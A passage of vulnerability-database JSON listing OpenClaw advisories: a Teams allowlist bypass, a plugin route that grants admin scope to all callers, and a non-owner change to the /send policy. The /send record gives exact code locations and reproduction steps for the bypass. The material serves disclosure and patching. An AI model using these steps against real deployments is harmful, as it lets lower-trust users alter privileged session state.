Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41365", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41365" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41365", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41365" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history" }, { "reference_url": "https://github.com/advisories/GHSA-chfm-xgc4-47rj", "reference_id": "GHSA-chfm-xgc4-47rj", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-chfm-xgc4-47rj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41365", "GHSA-chfm-xgc4-47rj" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j8fb-fhyc-33fu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91262?format=api", "vulnerability_id": "VCID-j92n-5217-9bhj", "summary": "OpenClaw: Gateway Plugin HTTP Auth Grants Unrestricted operator.admin Runtime Scope to All Callers\n## Summary\n\nGateway Plugin HTTP auth: \"gateway\" Mints operator.admin Runtime Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway-authenticated plugin HTTP routes previously created a runtime scope set that included `operator.admin` regardless of caller-granted scopes. Commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe` keeps plugin HTTP runtime scopes least-privileged and preserves caller scope boundaries.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`.\n\n## Fix Commit(s)\n\n- `ec2dbcff9afd8a52e00de054b506c91726d9fbbe`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35669", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15986", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1603", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1604", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35669" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35669", "reference_id": "CVE-2026-35669", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35669" }, { "reference_url": "https://github.com/advisories/GHSA-qm2m-28pf-hgjw", "reference_id": "GHSA-qm2m-28pf-hgjw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qm2m-28pf-hgjw" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope", "reference_id": "openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:16Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35669", "GHSA-qm2m-28pf-hgjw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j92n-5217-9bhj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91382?format=api", "vulnerability_id": "VCID-j96c-kau3-7fag", "summary": "OpenClaw: Non-owner command-authorized sender can change the owner-only `/send` session delivery policy\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title** \nNon-owner command-authorized sender can change the owner-only `/send` session delivery policy\n\n**CWE** \nCWE-285 Improper Authorization\n\n**CVSS v3.1** \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L \nBase score: **5.4 (Medium)**\n\n**Severity Assessment** \nMedium. This is a real owner-only authorization bypass, but the demonstrated impact is limited to persistent mutation of the current session’s delivery policy rather than direct code execution, sandbox escape, or cross-host compromise.\n\n**Impact** \nA non-owner sender who is allowed to run commands can invoke `/send on|off|inherit` and persistently change the current session’s `sendPolicy`, even though OpenClaw documents `/send` as owner-only.\n\nThat lets a lower-trust participant:\n- disable reply delivery for the current session (`/send off`), suppressing future replies in that chat;\n- re-enable reply delivery (`/send on`) after the owner intentionally disabled it;\n- remove the session override (`/send inherit`).\n\n**Affected Component** \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-session.ts:212-239`\n - `handleSendPolicyCommand(...)` checks only `params.command.isAuthorizedSender`.\n - when true, it mutates `params.sessionEntry.sendPolicy` and persists the session entry.\n\nAuthorization behavior that makes this reachable:\n- `src/auto-reply/command-auth.ts:401-407`\n - `senderIsOwner` is computed separately from general command authorization.\n- `src/auto-reply/command-auth.ts:420-429`\n - command authorization can succeed even when `senderIsOwner === false`.\n- `src/auto-reply/command-auth.owner-default.test.ts:10-47`\n - existing coverage confirms a sender can be command-authorized while not treated as owner.\n\nDocumented owner-only contract:\n- `docs/tools/slash-commands.md:112`\n - `/send on|off|inherit` is documented as owner-only.\n- `docs/concepts/session-tool.md:156`\n - `sendPolicy` is documented as settable via `sessions.patch` or owner-only `/send on|off|inherit`.\n\nRelated privilege model:\n- `src/gateway/method-scopes.ts:131-133`\n - `sessions.patch` is admin-scoped, which reinforces that session-delivery-policy mutation is treated as privileged state.\n\nVersion history:\n- The vulnerable handler exists in release history going back at least to commit `ea018a68ccb92dbc735bc1df9880d5c95c63ca35` (`refactor(auto-reply): split reply pipeline`).\n- Earliest released affected tag found: `v2026.1.14-1`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction** \n1. Check out the shipped release tag `v2026.3.23`.\n2. Configure a channel where:\n - a non-owner sender is allowed to run commands, for example through `commands.allowFrom`;\n - the owner identity is distinct, for example via `commands.ownerAllowFrom`.\n3. Start or reuse a session with a live `sessionEntry` and `sessionStore`.\n4. Send `/send off` as the non-owner but command-authorized sender.\n5. Confirm the resolved command context has:\n - `isAuthorizedSender === true`\n - `senderIsOwner === false`\n6. Observe that the handler still accepts the command, mutates `sessionEntry.sendPolicy`, and persists the session entry.\n\n**Demonstrated Impact** \nThe vulnerable handler performs a real persistent session-state change:\n- `src/auto-reply/reply/commands-session.ts:232-238`\n - `/send inherit` deletes `sessionEntry.sendPolicy`\n - other modes assign `sessionEntry.sendPolicy = sendPolicyCommand.mode`\n - the handler then calls `persistSessionEntry(params)`\n\nThe mutation is not gated by owner status, only by general command authorization.\n\nThat changes subsequent delivery behavior for the current session, which matches the documented meaning of `sendPolicy`.\n\n**Environment** \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check** \nUpon inspection there is no preexisting GHSA for `/send`.\n\nThis is distinct from:\n- `GHSA-r7vr-gr74-94p8`\n - that advisory covered owner-only authorization bypasses for `/config` and `/debug`, not `/send`.\n\nThis is the same authorization class, but a different privileged command surface that still lacks the owner check.\n\n**In Scope Check** \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** rely on trusted local state tampering;\n- `SECURITY.md:151-152` explicitly says non-owner sender status matters for owner-only tools and commands;\n- `/send` is explicitly documented as owner-only, so this is a direct owner-only authorization bypass, not a complaint about normal shared-agent steering.\n\nThis is therefore a concrete authorization flaw against a documented product boundary.\n\n**Remediation Advice** \n1. Change `/send` to require owner status, not just command authorization.\n2. Reuse the same owner-only rejection pattern already used by privileged command surfaces such as `/config`, `/debug`, and owner-only `/plugins` writes.\n3. Add regression coverage for the exact case where:\n - a non-owner sender is command-authorized;\n - `/send` must still be rejected unless `senderIsOwner === true`.\n4. Verify that the owner can still use `/send on|off|inherit` normally.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35620", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20449", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20489", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20501", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35620" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/555b2578a8cc6e1b93f717496935ead97bfbed8b" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ea018a68ccb92dbc735bc1df9880d5c95c63ca35" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-39mp-545q-w789" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35620", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35620" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:56Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-missing-authorization-in-send-and-allowlist-chat-commands" }, { "reference_url": "https://github.com/advisories/GHSA-39mp-545q-w789", "reference_id": "GHSA-39mp-545q-w789", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-39mp-545q-w789" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": 